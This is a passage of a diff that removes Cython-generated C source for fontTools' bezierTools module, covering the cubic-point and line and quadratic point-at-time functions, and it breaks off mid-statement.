*/ - __pyx_t_1 = PyNumber_Add(__pyx_v_ax, __pyx_v_dx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1005, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1005, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1005, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x4 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1006 - * y3 = (by + cy) / 3.0 + y2 - * x4 = ax + dx + cx + bx - * y4 = ay + dy + cy + by # <<<<<<<<<<<<<< - * return (x1, y1), (x2, y2), (x3, y3), (x4, y4) - * - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_ay, __pyx_v_dy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1006, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1006, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1006, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y4 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1007 - * x4 = ax + dx + cx + bx - * y4 = ay + dy + cy + by - * return (x1, y1), (x2, y2), (x3, y3), (x4, y4) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x1)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y1); - __Pyx_GIVEREF(__pyx_v_y1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y1)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x2)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y2); - __Pyx_GIVEREF(__pyx_v_y2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y2)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x3); - __Pyx_GIVEREF(__pyx_v_x3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x3)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y3); - __Pyx_GIVEREF(__pyx_v_y3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_y3)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_x4); - __Pyx_GIVEREF(__pyx_v_x4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_x4)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y4); - __Pyx_GIVEREF(__pyx_v_y4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_v_y4)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1007, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_1)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_2)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_3)) __PYX_ERR(0, 1007, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_5); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_5)) __PYX_ERR(0, 1007, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_5 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_x1); - __Pyx_XDECREF(__pyx_v_y1); - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XDECREF(__pyx_v_x4); - __Pyx_XDECREF(__pyx_v_y4); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1010 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.locals( - */ - -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicPointsC(__pyx_t_double_complex __pyx_v_a, __pyx_t_double_complex __pyx_v_b, __pyx_t_double_complex __pyx_v_c, __pyx_t_double_complex __pyx_v_d) { - __pyx_t_double_complex __pyx_v_p2; - __pyx_t_double_complex __pyx_v_p3; - __pyx_t_double_complex __pyx_v_p4; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicPointsC", 1); - - /* "fontTools/misc/bezierTools.py":1022 - * ) - * def calcCubicPointsC(a, b, c, d): - * p2 = c * (1 / 3) + d # <<<<<<<<<<<<<< - * p3 = (b + c) * (1 / 3) + p2 - * p4 = a + b + c + d - */ - __pyx_v_p2 = __Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_v_c, __pyx_t_double_complex_from_parts((1.0 / 3.0), 0)), __pyx_v_d); - - /* "fontTools/misc/bezierTools.py":1023 - * def calcCubicPointsC(a, b, c, d): - * p2 = c * (1 / 3) + d - * p3 = (b + c) * (1 / 3) + p2 # <<<<<<<<<<<<<< - * p4 = a + b + c + d - * return (d, p2, p3, p4) - */ - __pyx_v_p3 = __Pyx_c_sum_double(__Pyx_c_prod_double(__Pyx_c_sum_double(__pyx_v_b, __pyx_v_c), __pyx_t_double_complex_from_parts((1.0 / 3.0), 0)), __pyx_v_p2); - - /* "fontTools/misc/bezierTools.py":1024 - * p2 = c * (1 / 3) + d - * p3 = (b + c) * (1 / 3) + p2 - * p4 = a + b + c + d # <<<<<<<<<<<<<< - * return (d, p2, p3, p4) - * - */ - __pyx_v_p4 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__pyx_v_a, __pyx_v_b), __pyx_v_c), __pyx_v_d); - - /* "fontTools/misc/bezierTools.py":1025 - * p3 = (b + c) * (1 / 3) + p2 - * p4 = a + b + c + d - * return (d, p2, p3, p4) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_d); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_p2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_p3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_p4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1025, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1)) __PYX_ERR(0, 1025, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_2)) __PYX_ERR(0, 1025, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 1025, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_4)) __PYX_ERR(0, 1025, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1010 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.locals( - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicPointsC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = 0; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_59linePointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_58linePointAtT, "linePointAtT(pt1, pt2, t)\nFinds the point at time `t` on a line.\n\n Args:\n pt1, pt2: Coordinates of the line as 2D tuples.\n t: The time along the line.\n\n Returns:\n A 2D tuple with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_59linePointAtT = {"linePointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_59linePointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_58linePointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_59linePointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("linePointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1033, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1033, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("linePointAtT", 1, 3, 3, 1); __PYX_ERR(0, 1033, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1033, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("linePointAtT", 1, 3, 3, 2); __PYX_ERR(0, 1033, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "linePointAtT") < 0)) __PYX_ERR(0, 1033, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_t = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("linePointAtT", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 1033, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.linePointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_58linePointAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_58linePointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_t) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("linePointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1043 - * A 2D tuple with the coordinates of the point. - * """ - * return ((pt1[0] * (1 - t) + pt2[0] * t), (pt1[1] * (1 - t) + pt2[1] * t)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1043, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 1043, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 1043, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools.linePointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_61quadraticPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_60quadraticPointAtT, "quadraticPointAtT(pt1, pt2, pt3, t)\nFinds the point at time `t` on a quadratic curve.\n\n Args:\n pt1, pt2, pt3: Coordinates of the curve as 2D tuples.\n t: The time along the curve.\n\n Returns:\n A 2D tuple with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_61quadraticPointAtT = {"quadraticPointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_61quadraticPointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_60quadraticPointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_61quadraticPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("quadraticPointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, 1); __PYX_ERR(0, 1046, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, 2); __PYX_ERR(0, 1046, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1046, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("quadraticPointAtT", 1, 4, 4, 3); __PYX_ERR(0, 1046, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "quadraticPointAtT") < 0)) 